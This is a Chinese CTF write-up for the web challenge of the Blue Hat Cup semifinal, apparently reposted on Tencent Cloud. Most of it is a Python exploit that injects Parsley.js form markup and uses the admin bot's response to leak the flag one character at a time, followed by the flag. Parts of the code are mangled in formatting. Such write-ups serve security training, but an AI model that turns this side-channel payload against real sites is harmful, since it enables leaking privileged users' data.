蓝帽杯半决赛wp_web部分
蓝帽杯半决赛wp_web部分
h3110_w0r1d
发布于 2024-02-19 20:23:48
发布于 2024-02-19 20:23:48
ArticleShare
在前端代码中得知:side channel attack
exp如下
``` import requests import time import sys
def main(host, port):
s = requests.Session()
base_url = f"http://{host}:{port}/"
res = s.get(base_url)
pos = res.text.find('name="c" value="') + len('name="c" value="')
csrftoken = res.text[pos:pos+16]
ss = "abcdef0123456789"
flag = ""
for i in range(16):
for j in ss:
print("trying",j)
payload = f'''<form data-parsley-validate>
<input data-parsley-required
data-parsley-trigger=\"blur\"
data-parsley-error-message=\"<input type=button id=like>\"
data-parsley-errors-container=\"a[href^=\'/lookup.php?id={flag + j}\']\"
autofocus>
</form>'''
data = {'c': csrftoken, 'content': payload}
res = s.post(base_url + "add.php", data=data, allow_redirects=False)
#print(res.headers)
location = res.headers['Location']
pos = location.find('id=') + 3
wp = location[pos:]
data = {'c': csrftoken, 'id': wp}
res = s.post(base_url + "admin.php", data=data)
time.sleep(10)
res = s.get(f"http://{host}:{port}/lookup.php?id={wp}")
txt = res.text.replace("\n", "").replace("\r", "")
if "Liked by</h3>admin" not in txt:
flag += j
print(i,flag)
breakif name == ‘main‘:
main("********","*****")4. 如果中间出现没爆出来的就把前面爆出来的几位去掉最后一位,然后添加在flag前面继续爆就行
5. flag如下
6. ```
ctf{s1d3_ch4nn3l_attack_is_funny_bluecup2023_got_it}本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2023-09-16,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录